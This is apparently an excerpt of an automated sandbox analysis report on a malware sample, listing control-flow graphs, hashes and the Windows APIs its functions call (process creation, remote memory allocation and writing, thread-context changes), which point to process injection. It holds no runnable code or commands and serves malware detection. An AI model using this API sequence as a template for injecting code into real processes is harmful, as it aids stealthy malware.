                                                            control_flow_graph 1123 6428700-6428770 1125 6428772-642877c 1123->1125 1126 64287a9-64287c9 1123->1126 1125->1126 1127 642877e-6428780 1125->1127 1131 6428802-642883c 1126->1131 1132 64287cb-64287d5 1126->1132 1129 6428782-642878c 1127->1129 1130 64287a3-64287a6 1127->1130 1133 6428790-642879f 1129->1133 1134 642878e 1129->1134 1130->1126 1142 6428875-64288ea CreateProcessA 1131->1142 1143 642883e-6428848 1131->1143 1132->1131 1135 64287d7-64287d9 1132->1135 1133->1133 1136 64287a1 1133->1136 1134->1133 1137 64287db-64287e5 1135->1137 1138 64287fc-64287ff 1135->1138 1136->1130 1140 64287e7 1137->1140 1141 64287e9-64287f8 1137->1141 1138->1131 1140->1141 1141->1141 1144 64287fa 1141->1144 1153 64288f3-642893b 1142->1153 1154 64288ec-64288f2 1142->1154 1143->1142 1145 642884a-642884c 1143->1145 1144->1138 1147 642884e-6428858 1145->1147 1148 642886f-6428872 1145->1148 1149 642885a 1147->1149 1150 642885c-642886b 1147->1150 1148->1142 1149->1150 1150->1150 1151 642886d 1150->1151 1151->1148 1159 642894b-642894f 1153->1159 1160 642893d-6428941 1153->1160 1154->1153 1162 6428951-6428955 1159->1162 1163 642895f-6428963 1159->1163 1160->1159 1161 6428943 1160->1161 1161->1159 1162->1163 1164 6428957 1162->1164 1165 6428973 1163->1165 1166 6428965-6428969 1163->1166 1164->1163 1168 6428974 1165->1168 1166->1165 1167 642896b 1166->1167 1167->1165 1168->1168
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064288DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID: Vv'$Vv'
                                                            • API String ID: 963392458-3897546610
                                                            • Opcode ID: ac316212fdbb2d6931c25b65866c57eab060345b2f3dee8903eb97b1dbcc5cdf
                                                            • Instruction ID: ada8f2af906604f5309b83f9fd970f6181d850b5984c6a570fe9dcefabc03e4c
                                                            • Opcode Fuzzy Hash: ac316212fdbb2d6931c25b65866c57eab060345b2f3dee8903eb97b1dbcc5cdf
                                                            • Instruction Fuzzy Hash: 5F814771D0022A9FDB51DFA9C9817EEBBF2BF48310F64852AE854E7340DB748895CB81
                                                            Function 0631D154 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1169 631d154-631d1c1 1172 631d1c3-631d1cd 1169->1172 1173 631d1fa-631d21a 1169->1173 1172->1173 1174 631d1cf-631d1d1 1172->1174 1178 631d253-631d2b5 CopyFileA 1173->1178 1179 631d21c-631d226 1173->1179 1176 631d1d3-631d1dd 1174->1176 1177 631d1f4-631d1f7 1174->1177 1180 631d1e1-631d1f0 1176->1180 1181 631d1df 1176->1181 1177->1173 1191 631d2b7-631d2bd 1178->1191 1192 631d2be-631d306 1178->1192 1179->1178 1182 631d228-631d22a 1179->1182 1180->1180 1183 631d1f2 1180->1183 1181->1180 1184 631d24d-631d250 1182->1184 1185 631d22c-631d236 1182->1185 1183->1177 1184->1178 1187 631d238 1185->1187 1188 631d23a-631d249 1185->1188 1187->1188 1188->1188 1189 631d24b 1188->1189 1189->1184 1191->1192 1197 631d316-631d31a 1192->1197 1198 631d308-631d30c 1192->1198 1200 631d32a 1197->1200 1201 631d31c-631d320 1197->1201 1198->1197 1199 631d30e 1198->1199 1199->1197 1203 631d32b 1200->1203 1201->1200 1202 631d322 1201->1202 1202->1200 1203->1203
                                                            APIs
                                                            • CopyFileA.KERNEL32(?,?,?), ref: 0631D2A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280640023.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6310000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: CopyFile
                                                            • String ID: Vv'$Vv'
                                                            • API String ID: 1304948518-3897546610
                                                            • Opcode ID: 510e81bbdd3e8828bbeedcad56157c02c104a4531d0b7b9f54e1229c4f2fc273
                                                            • Instruction ID: 5aa72f2b6dc46613155edf201dc5ed2315f87d05b5e7b61a30f9ee6cfde4f998
                                                            • Opcode Fuzzy Hash: 510e81bbdd3e8828bbeedcad56157c02c104a4531d0b7b9f54e1229c4f2fc273
                                                            • Instruction Fuzzy Hash: 5F518871D003599FDB58CFA9C8817EEBBF2FF49310F148529E815AB284DB749886CB91
                                                            Function 0631D160 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1204 631d160-631d1c1 1206 631d1c3-631d1cd 1204->1206 1207 631d1fa-631d21a 1204->1207 1206->1207 1208 631d1cf-631d1d1 1206->1208 1212 631d253-631d2b5 CopyFileA 1207->1212 1213 631d21c-631d226 1207->1213 1210 631d1d3-631d1dd 1208->1210 1211 631d1f4-631d1f7 1208->1211 1214 631d1e1-631d1f0 1210->1214 1215 631d1df 1210->1215 1211->1207 1225 631d2b7-631d2bd 1212->1225 1226 631d2be-631d306 1212->1226 1213->1212 1216 631d228-631d22a 1213->1216 1214->1214 1217 631d1f2 1214->1217 1215->1214 1218 631d24d-631d250 1216->1218 1219 631d22c-631d236 1216->1219 1217->1211 1218->1212 1221 631d238 1219->1221 1222 631d23a-631d249 1219->1222 1221->1222 1222->1222 1223 631d24b 1222->1223 1223->1218 1225->1226 1231 631d316-631d31a 1226->1231 1232 631d308-631d30c 1226->1232 1234 631d32a 1231->1234 1235 631d31c-631d320 1231->1235 1232->1231 1233 631d30e 1232->1233 1233->1231 1237 631d32b 1234->1237 1235->1234 1236 631d322 1235->1236 1236->1234 1237->1237
                                                            APIs
                                                            • CopyFileA.KERNEL32(?,?,?), ref: 0631D2A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280640023.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6310000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: CopyFile
                                                            • String ID: Vv'$Vv'
                                                            • API String ID: 1304948518-3897546610
                                                            • Opcode ID: 9cde221028af0ac5930ffc10c202a4caa689192fcbcdd892755288fdf3337eb7
                                                            • Instruction ID: 165af360d5dfbe9ebfa4c7b4a2d9f3b774d44b9d62dc5b956df3abb873b5823a
                                                            • Opcode Fuzzy Hash: 9cde221028af0ac5930ffc10c202a4caa689192fcbcdd892755288fdf3337eb7
                                                            • Instruction Fuzzy Hash: AF517871D003598FDB58CFA9C8857AEBBF2FF49310F148529E815EB284DB748886CB80
                                                            Function 06110568 Relevance: 4.2, Strings: 3, Instructions: 469COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1238 6110568-61105a0 1240 61105a2-61105e9 1238->1240 1241 61105ee-61105fc 1238->1241 1284 6110a45-6110a4c 1240->1284 1242 611060b 1241->1242 1243 61105fe-6110609 1241->1243 1244 611060d-6110614 1242->1244 1243->1244 1247 611061a-611061e 1244->1247 1248 61106fd-6110701 1244->1248 1251 6110624-6110628 1247->1251 1252 6110a4d-6110a75 1247->1252 1249 6110703-6110712 1248->1249 1250 6110757-6110761 1248->1250 1263 6110716-611071b 1249->1263 1256 6110763-6110772 1250->1256 1257 611079a-61107c0 1250->1257 1254 611063a-6110698 1251->1254 1255 611062a-6110634 1251->1255 1260 6110a7c-6110aa6 1252->1260 1293 6110b0b-6110b35 1254->1293 1294 611069e-61106f8 1254->1294 1255->1254 1255->1260 1268 6110778-6110795 1256->1268 1269 6110aae-6110ac4 1256->1269 1280 61107c2-61107cb 1257->1280 1281 61107cd 1257->1281 1260->1269 1270 6110714 1263->1270 1271 611071d-6110752 call 6110040 1263->1271 1268->1284 1295 6110acc-6110b04 1269->1295 1270->1263 1271->1284 1286 61107cf-61107f7 1280->1286 1281->1286 1298 61108c8-61108cc 1286->1298 1299 61107fd-6110816 1286->1299 1311 6110b37-6110b3d 1293->1311 1312 6110b3f-6110b45 1293->1312 1294->1284 1295->1293 1303 6110946-6110950 1298->1303 1304 61108ce-61108e7 1298->1304 1299->1298 1325 611081c-611082b 1299->1325 1307 6110952-611095c 1303->1307 1308 61109ad-61109b6 1303->1308 1304->1303 1328 61108e9-61108f8 1304->1328 1323 6110962-6110974 1307->1323 1324 611095e-6110960 1307->1324 1314 61109b8-61109e6 1308->1314 1315 61109ee-6110a3b 1308->1315 1311->1312 1316 6110b46-6110b83 1311->1316 1314->1315 1332 6110a43 1315->1332 1330 6110976-6110978 1323->1330 1324->1330 1343 6110843-6110858 1325->1343 1344 611082d-6110833 1325->1344 1347 6110910-611091b 1328->1347 1348 61108fa-6110900 1328->1348 1337 61109a6-61109ab 1330->1337 1338 611097a-611097e 1330->1338 1332->1284 1337->1307 1337->1308 1339 6110980-6110999 1338->1339 1340 611099c-611099f 1338->1340 1339->1340 1340->1337 1345 611085a-6110886 1343->1345 1346 611088c-6110895 1343->1346 1349 6110835 1344->1349 1350 6110837-6110839 1344->1350 1345->1295 1345->1346 1346->1293 1355 611089b-61108c2 1346->1355 1347->1293 1358 6110921-6110944 1347->1358 1356 6110902 1348->1356 1357 6110904-6110906 1348->1357 1349->1343 1350->1343 1355->1298 1355->1325 1356->1347 1357->1347 1358->1303 1358->1328
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2279675295.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6110000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Hq$Hq$Hq
                                                            • API String ID: 0-2505839570
                                                            • Opcode ID: ec1081a525cb858f4e9e9aae1d9adf6a3d4c4e8fbc2277615c7119fcf573071b
                                                            • Instruction ID: 0b6d17893f42772e74415f9bdf48e485d4a471cc8d797244b0858c3872de61b6
                                                            • Opcode Fuzzy Hash: ec1081a525cb858f4e9e9aae1d9adf6a3d4c4e8fbc2277615c7119fcf573071b
                                                            • Instruction Fuzzy Hash: 8F027030E007098FDBA4DFA4D894A6EB7F2FF88301F14852DE54A9B651DB31AC46CB91
                                                            Function 06112228 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1370 6112228-6112265 1373 6112287-611229d call 6112030 1370->1373 1374 6112267-611226a 1370->1374 1380 6112613-6112627 1373->1380 1381 61122a3-61122af 1373->1381 1486 611226c call 6112b40 1374->1486 1487 611226c call 6112b98 1374->1487 1488 611226c call 6112b88 1374->1488 1376 6112272-6112274 1376->1373 1378 6112276-611227e 1376->1378 1378->1373 1389 6112667-6112670 1380->1389 1382 61123e0-61123e7 1381->1382 1383 61122b5-61122b8 1381->1383 1385 6112516-6112553 call 6111a38 call 61149d0 1382->1385 1386 61123ed-61123f6 1382->1386 1387 61122bb-61122c4 1383->1387 1430 6112559-611260a call 6111a38 1385->1430 1386->1385 1390 61123fc-6112508 call 6111a38 call 6111fc8 call 6111a38 1386->1390 1391 6112708 1387->1391 1392 61122ca-61122de 1387->1392 1395 6112672-6112679 1389->1395 1396 6112635-611263e 1389->1396 1482 6112513-6112514 1390->1482 1483 611250a 1390->1483 1394 611270d-6112711 1391->1394 1404 61123d0-61123da 1392->1404 1405 61122e4-6112379 call 6112030 * 2 call 6111a38 call 6111fc8 call 6112070 call 6112118 call 6112180 1392->1405 1402 6112713 1394->1402 1403 611271c 1394->1403 1398 61126c7-61126ce 1395->1398 1399 611267b-61126be call 6111a38 1395->1399 1396->1391 1400 6112644-6112656 1396->1400 1406 61126d0-61126e0 1398->1406 1407 61126f3-6112706 1398->1407 1399->1398 1418 6112666 1400->1418 1419 6112658-611265d 1400->1419 1402->1403 1414 611271d 1403->1414 1404->1382 1404->1387 1461 6112398-61123cb call 6112180 1405->1461 1462 611237b-6112393 call 6112118 call 6111a38 call 6111ce8 1405->1462 1406->1407 1421 61126e2-61126ea 1406->1421 1407->1394 1414->1414 1418->1389 1489 6112660 call 6115161 1419->1489 1490 6112660 call 6115170 1419->1490 1421->1407 1430->1380 1461->1404 1462->1461 1482->1385 1483->1482 1486->1376 1487->1376 1488->1376 1489->1418 1490->1418
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2279675295.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6110000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'q$4'q$4'q
                                                            • API String ID: 0-3126650252
                                                            • Opcode ID: a483e6a8812ddf6060044a43843a32340c81b2a449ceddf430176f29336705b0
                                                            • Instruction ID: b6d47ba578fa779b9f3dfb07a5a676d4a1246f821e42fa24948303ee54b0309a
                                                            • Opcode Fuzzy Hash: a483e6a8812ddf6060044a43843a32340c81b2a449ceddf430176f29336705b0
                                                            • Instruction Fuzzy Hash: E3F1C934A10218DFCB48DBA4D998E9DBBB2FF89301F518165E905AB3A5DB71ED42CF40
                                                            Function 06116800 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1491 6116800-6116810 1492 6116816-611681a 1491->1492 1493 6116929-611694e 1491->1493 1494 6116820-6116829 1492->1494 1495 6116955-611697a 1492->1495 1493->1495 1497 6116981-61169b7 1494->1497 1498 611682f-6116856 1494->1498 1495->1497 1515 61169be-61169d4 1497->1515 1508 611685c-611685e 1498->1508 1509 611691e-6116928 1498->1509 1511 6116860-6116863 1508->1511 1512 611687f-6116881 1508->1512 1514 6116869-6116873 1511->1514 1511->1515 1513 6116884-6116888 1512->1513 1517 61168e9-61168f5 1513->1517 1518 611688a-6116899 1513->1518 1514->1515 1516 6116879-611687d 1514->1516 1522 61169d7-61169fe 1515->1522 1523 61169ff-6116a14 1515->1523 1516->1512 1516->1513 1517->1515 1520 61168fb-6116918 1517->1520 1518->1515 1526 611689f-61168e6 1518->1526 1520->1508 1520->1509 1522->1523 1531 6116a16-6116a2a call 6116cd0 1523->1531 1532 6116a38-6116a4f 1523->1532 1526->1517 1608 6116a2d call 6116d90 1531->1608 1609 6116a2d call 6116d80 1531->1609 1610 6116a2d call 6116f18 1531->1610 1611 6116a2d call 6117078 1531->1611 1540 6116b40-6116b50 1532->1540 1541 6116a55-6116b3b call 6112030 call 6111a38 * 2 call 6112070 call 6115838 call 6111a38 call 61149d0 call 61128d8 1532->1541 1537 6116a33 1542 6116c63-6116c6e 1537->1542 1551 6116b56-6116c30 call 6112030 * 2 call 61127e8 call 6111a38 * 2 call 6111ce8 call 6112180 call 6111a38 1540->1551 1552 6116c3e-6116c5a call 6111a38 1540->1552 1541->1540 1548 6116c70-6116c80 1542->1548 1549 6116c9d-6116cbe call 6112180 1542->1549 1561 6116c90-6116c98 call 61128d8 1548->1561 1562 6116c82-6116c88 1548->1562 1603 6116c32 1551->1603 1604 6116c3b 1551->1604 1552->1542 1561->1549 1562->1561 1603->1604 1604->1552 1608->1537 1609->1537 1610->1537 1611->1537
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2279675295.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6110000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (q$(q$Hq
                                                            • API String ID: 0-2914423630
                                                            • Opcode ID: a99ebce7597372b1383fa1d5dd888dff37427f289afb5135ba2b48d7a48df078
                                                            • Instruction ID: 7f64012ad0bf533cf3794873238e3787dc9bd8dfb283c5d428e51ac6dcdb9a4d
                                                            • Opcode Fuzzy Hash: a99ebce7597372b1383fa1d5dd888dff37427f289afb5135ba2b48d7a48df078
                                                            • Instruction Fuzzy Hash: 5DE14134A01209DFCB44EF64D89499EBBB2FFC9300F108569E906AB364DB31ED46CB91
                                                            Function 0612065F Relevance: 3.8, Strings: 3, Instructions: 30COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1694 612065f-612067f 1707 6120685 call 6120a50 1694->1707 1708 6120685 call 6120a60 1694->1708 1696 612068b-61206d7 1699 61200cb-61200d1 1696->1699 1700 61206dd-61206e5 1696->1700 1701 61200d3-612064b 1699->1701 1702 61200da-6120142 1699->1702 1700->1699 1701->1699 1706 6120651-6120659 1701->1706 1702->1699 1704 6120144-612014c 1702->1704 1704->1699 1706->1699 1707->1696 1708->1696
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2279727386.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6120000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *$/$TJq
                                                            • API String ID: 0-3429316256
                                                            • Opcode ID: aaf8174196cb2123cdea7754ef96667885c42fb60d6812b871cf4be020becf6f
                                                            • Instruction ID: 8cb127a65841b10462dba26147cfdb11cccf4d7e775c367f6cc8e0b261c7105f
                                                            • Opcode Fuzzy Hash: aaf8174196cb2123cdea7754ef96667885c42fb60d6812b871cf4be020becf6f
                                                            • Instruction Fuzzy Hash: 0A011674A02218CFEB50DF58D984B9EB7F2FB4A301F1040EAD149A3300C7305E898F5A
                                                            Function 0642ABC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1709 642abc0-642ac16 1712 642ac26-642ac65 WriteProcessMemory 1709->1712 1713 642ac18-642ac24 1709->1713 1715 642ac67-642ac6d 1712->1715 1716 642ac6e-642ac9e 1712->1716 1713->1712 1715->1716
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0642AC58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID: Vv'
                                                            • API String ID: 3559483778-517628335
                                                            • Opcode ID: 7221be28de7b2861f032408deace5dd2ffeb6121e4fcbb9fea135a6bd1c6c2d9
                                                            • Instruction ID: b6febd7920bae3d192bd1fc12a2fdcb2b46ee7ca9e06b69bddca1eb001a1e17f
                                                            • Opcode Fuzzy Hash: 7221be28de7b2861f032408deace5dd2ffeb6121e4fcbb9fea135a6bd1c6c2d9
                                                            • Instruction Fuzzy Hash: 5C212671D003199FDB10DFAAC885BDEBBF5FB48310F50842AE958A7240CB789945CBA4
                                                            Function 0642ABC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0642AC58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID: Vv'
                                                            • API String ID: 3559483778-517628335
                                                            • Opcode ID: 158a3c02225e96a9c24a1a22696489db245c967a408cdde7c0ca2a89a8de5e12
                                                            • Instruction ID: 40bb4bd809a84fb57d2c7a0bad9ff47b08ee298ac0209261839dea4097786351
                                                            • Opcode Fuzzy Hash: 158a3c02225e96a9c24a1a22696489db245c967a408cdde7c0ca2a89a8de5e12
                                                            • Instruction Fuzzy Hash: 9E2124B1D003199FDB10DFAAC985BDEBBF5FF48310F50842AE918A7240D7789945CBA4
                                                            Function 0642A3A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1720 642a3a0-642a3f3 1723 642a403-642a433 Wow64SetThreadContext 1720->1723 1724 642a3f5-642a401 1720->1724 1726 642a435-642a43b 1723->1726 1727 642a43c-642a46c 1723->1727 1724->1723 1726->1727
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0642A426
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID: Vv'
                                                            • API String ID: 983334009-517628335
                                                            • Opcode ID: 5f760b1bbc7cdb9a4aa3c1736466f7ee8e3f96555a1a2a912885d6f1cd335f81
                                                            • Instruction ID: 47505e36dbdc7afa4d82373ec7d5323dcf2db6036bf4f761551e7bbcee90df45
                                                            • Opcode Fuzzy Hash: 5f760b1bbc7cdb9a4aa3c1736466f7ee8e3f96555a1a2a912885d6f1cd335f81
                                                            • Instruction Fuzzy Hash: 44215971D003099FDB14DFAAC485BEEBBF4EF48314F54842AD819A7241CB789985CFA5
                                                            Function 0642A3A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0642A426
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID: Vv'
                                                            • API String ID: 983334009-517628335
                                                            • Opcode ID: eb6422302a5ebb2a6ddcafdeeb0ebc1c560b2dd843ef2e7f3a405b4f79bf5768
                                                            • Instruction ID: 53e0c98e13e84d407a00cbfe9aa6281e377a885478481a1ad5ab633de8ba57de
                                                            • Opcode Fuzzy Hash: eb6422302a5ebb2a6ddcafdeeb0ebc1c560b2dd843ef2e7f3a405b4f79bf5768
                                                            • Instruction Fuzzy Hash: A0213871D003098FDB14DFAAC485BAEBBF4EF48314F54842AD819A7341CB789945CFA4
                                                            Function 063139B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06313A34
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280640023.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6310000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 544645111-517628335
                                                            • Opcode ID: 56d0166ee033933f2a7929ccf0927cc405ba0d9a27564df5d156b09b056365e4
                                                            • Instruction ID: 2ba32314258a824655453353f6d2665a8484232132424ab40a6e0659240528c4
                                                            • Opcode Fuzzy Hash: 56d0166ee033933f2a7929ccf0927cc405ba0d9a27564df5d156b09b056365e4
                                                            • Instruction Fuzzy Hash: 5D214871C003099FDB14DFAAC840BAEBBF4FF48320F548429D418A7240CB789541CFA0
                                                            Function 0642A950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0642A9C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 4275171209-517628335
                                                            • Opcode ID: 7ade26a8a7ac3a92cd8b798e2f7ad4522d2257e929be70f6ffe64da42f9cc20d
                                                            • Instruction ID: f62322b2aa3b834511026d7b60313285de75d2af272377da0705a5ca26d65952
                                                            • Opcode Fuzzy Hash: 7ade26a8a7ac3a92cd8b798e2f7ad4522d2257e929be70f6ffe64da42f9cc20d
                                                            • Instruction Fuzzy Hash: 15114A75C003099FDB20DFAAC845BDFBFF5EB48310F208819E959A7250C7359941CBA0
                                                            Function 063139C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06313A34
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280640023.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6310000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 544645111-517628335
                                                            • Opcode ID: 98c49f71c77b9bacc60cdb6c659ecdb2b8140f09439611a28224d3344f16f42c
                                                            • Instruction ID: 8a8f3a5cc9e7900916455b2814c3972d17db6fe272dea8eef2cfa6f031d387c3
                                                            • Opcode Fuzzy Hash: 98c49f71c77b9bacc60cdb6c659ecdb2b8140f09439611a28224d3344f16f42c
                                                            • Instruction Fuzzy Hash: 83211871C003099FDB14DFAAC445BAEBBF5FF48320F548429D419A7240DB799545CFA5
                                                            Function 0633D848 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 0633D8BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2280774744.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6330000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 544645111-517628335
                                                            • Opcode ID: c4310e3b168e7fc493676bd82711a1fb4fdfe7ad81f600258e2ddaee4851f9e9
                                                            • Instruction ID: 8ddb17ceb9545f04f11637f9fda5ccc84bc59d3a1c1fe4c7482ce3411466403e
                                                            • Opcode Fuzzy Hash: c4310e3b168e7fc493676bd82711a1fb4fdfe7ad81f600258e2ddaee4851f9e9
                                                            • Instruction Fuzzy Hash: 7411E371D003099FDB24DFAAC884B9EFBF5AF48320F54842AD429A7240CB75A945CFA4
                                                            Function 0642A958 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0642A9C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2281242669.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6420000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: Vv'
                                                            • API String ID: 4275171209-517628335
                                                            • Opcode ID: 055974c6dc2e97b43b734430eabc15c0bce14b1fb5f30a793360c3a04c7fbf63
                                                            • Instruction ID: 21764ba172446a19f4ac0bb4a51165f1ffa9dadd61ea05a2ad9d50d69cc2aa14
                                                            • Opcode Fuzzy Hash: 055974c6dc2e97b43b734430eabc15c0bce14b1fb5f30a793360c3a04c7fbf63
                                                            • Instruction Fuzzy Hash: 8A111771C003499FDB20DFAAC845BDEBBF5AB48310F54881AE915A7250C7759550CBA4
                                                            Function 057136E8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2278170500.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5710000_Ref#103052.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'q$4'q
                                                            • API String ID: 0-1467158625
                                                            • Opcode ID: b4496c4c3f3c7e14a6a95109281255db045aca926837ecde1aece075e539b573
                                                            • Instruction ID: e8ac9d4d82202eab93e0975324606f56f023b65db23b04c8d26b166835667080
                                                            • Opcode Fuzzy Hash: b4496c4c3f3c7e14a6a95109281255db045aca926837ecde1aece075e539b573
